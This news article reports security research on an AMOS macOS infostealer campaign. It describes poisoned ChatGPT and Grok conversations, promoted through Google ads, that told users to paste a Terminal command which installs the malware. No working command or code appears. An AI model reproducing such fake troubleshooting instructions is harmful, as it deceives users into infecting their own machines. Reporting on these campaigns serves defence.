- AMOS operators used malvertising and poisoning ChatGPT/Grok conversations to deliver malware to Macs.
- Fake “free disk space” guides tricked users into running terminal commands that installed AMOS
- The campaign abused Google ads and trusted AI platforms, boosting the credibility and success of the infections.
AtomicOS (AMOS) criminals use a combination of malvertising and GenAI response poisoning to trick MacOS users into downloading malware. That’s according to cybersecurity researcher Huntress, who claims not only to have observed the attacks in the wild, but also to have replicated the same results as other victims.
In a blog post published earlier this week, Huntress said AMOS officials first created two AI conversations: one with ChatGPT and one with Grok.
These conversations were about freeing up disk space on a MacOS device and included instructions on how to do it. However, the instructions are fake and ask the user to bring up the Terminal app and enter a command that downloads and runs the AMOS infostealer.
A variation of ClickFix
From there, they purchased advertising space on Google to promote these conversations. This way, when a user searches for something like “how to free up disk space on MacOS”, these poison conversations would be displayed at the very top of the search engine results page.
Apparently the trick worked, as Huntress was brought in to investigate a case of AMOS infection. For those who don’t know, AMOS is an infamous MacOS information stealer, capable of stealing sensitive data, passwords, cryptocurrency wallet information, and much more.
The scam works similar to ClickFix, another technique that tricks victims into executing Terminal commands. The only difference is that in this case, victims are proactively looking for a solution to a real problem rather than a non-existent one. What makes this campaign more dangerous is that it abuses not one, but three trusted services: Google’s search engine, ChatGPT, and Grok Answers.
Ultimately, both conversations are hosted on their respective platforms, increasing the perceived legitimacy of both instructions. It is unclear, however, how the AMOS operators managed to get ChatGPT and Grok to display these results.
Via Apple Insider
The best antivirus for every budget
Follow TechRadar on Google News And add us as your favorite source to get our news, reviews and expert opinions in your feeds. Make sure to click the Follow button!
And of course you can too follow TechRadar on TikTok for news, reviews, unboxings in video form and receive regular updates from us on WhatsApp Also.
